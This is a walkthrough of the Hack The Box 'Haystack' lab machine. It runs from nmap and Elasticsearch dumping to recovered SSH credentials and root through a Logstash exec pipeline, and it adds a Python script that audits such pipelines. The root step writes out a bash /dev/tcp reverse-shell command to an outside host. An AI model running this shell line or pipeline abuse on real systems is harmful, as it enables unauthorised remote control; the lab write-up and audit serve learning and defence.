hackthebox-Haystack

  • An nmap scan finds ports 22, 80 and 9200 (Elasticsearch 6.4.2) open
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
  • Visiting http://10.10.10.115 returns an image, needle.jpg. Opening it in Stegsolve reveals a base64 hint; decoding it gives a hint in Spanish

(image: needle.jpg)

la aguja en el pajar es "clave"
the needle in the haystack is "key"
  • Use elasticsearch-dump to pull the quotes index from port 9200. Searching the dump for base64 (look for its characteristic padding, e.g. "=") turns up two base64-encoded values, a username and a password, which decode to security and spanish.is.key
elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data
  • Log in with ssh and read user.txt

  • Upload LinEnum with scp to enumerate the target. The first finding is that logstash runs as root; trying to read the config files in /etc/logstash/conf.d/ shows they require root or kibana privileges

  • Reading the configs in /etc/logstash/conf.d/ shows that logstash reads /opt/kibana/logstash_* every 10 s and executes the content after filtering, so run echo "Ejecutar comando : bash -i >& /dev/tcp/10.10.14.52/22222 0>&1" > /opt/kibana/logstash_ert (you can set up your own kibana and use its grok debugger to test the filter), then wait a while for the shell to come back
cat /etc/logstash/conf.d/filter.conf
filter {
    if [type] == "execute" {
        grok {
            match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
        }
    }
}

cat /etc/logstash/conf.d/input.conf
input {
    file {
        path => "/opt/kibana/logstash_*"
        start_position => "beginning"
        sincedb_path => "/dev/null"
        stat_interval => "10 second"
        type => "execute"
        mode => "read"
    }
}

cat /etc/logstash/conf.d/output.conf
output {
    if [type] == "execute" {
        stdout { codec => json }
        exec {
            command => "%{comando} &"
        }
    }
}
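As an added example (not part of the writeup), a small Python audit of this pipeline: it flags any exec output whose command string interpolates an event field, and lists the file inputs that feed it. The three conf.d files above are embedded as a constructed sample; the fix on the defending side is a static command string and a watched directory that only root can write to.

```python
import re

# Constructed sample: the three conf.d files from the writeup, concatenated the
# way Logstash itself merges /etc/logstash/conf.d/*.conf into one pipeline.
SAMPLE_PIPELINE = r'''
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
filter {
  if [type] == "execute" {
    grok { match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" } }
  }
}
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec { command => "%{comando} &" }
  }
}
'''

# Minimal extraction for the common one-setting-per-line style; a production
# audit should use Logstash's own config parser instead of these regexes.
FILE_PATH_RE = re.compile(r'file\s*\{[^}]*?path\s*=>\s*"([^"]+)"')
EXEC_CMD_RE = re.compile(r'exec\s*\{[^}]*?command\s*=>\s*"([^"]+)"')
SPRINTF_RE = re.compile(r'%\{([^}]+)\}')  # Logstash sprintf field reference


def audit_pipeline(config: str) -> list[str]:
    """Return one finding per risky exec command and per input feeding it."""
    findings = []
    inputs = FILE_PATH_RE.findall(config)
    for cmd in EXEC_CMD_RE.findall(config):
        fields = SPRINTF_RE.findall(cmd)
        if not fields:
            continue  # static command string: no event data reaches the shell
        findings.append(f"exec command {cmd!r} interpolates event field(s) {fields}; "
                        "whoever controls the event text controls the command")
        for path in inputs:
            findings.append(f"file input {path!r} feeds that exec; anyone who can "
                            "write there runs commands as the logstash user")
    return findings
```

With sincedb_path set to /dev/null and mode "read", every file matching the glob is re-read from the start on each scan, so a newly dropped file is processed within one stat_interval.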
  • Read root.txt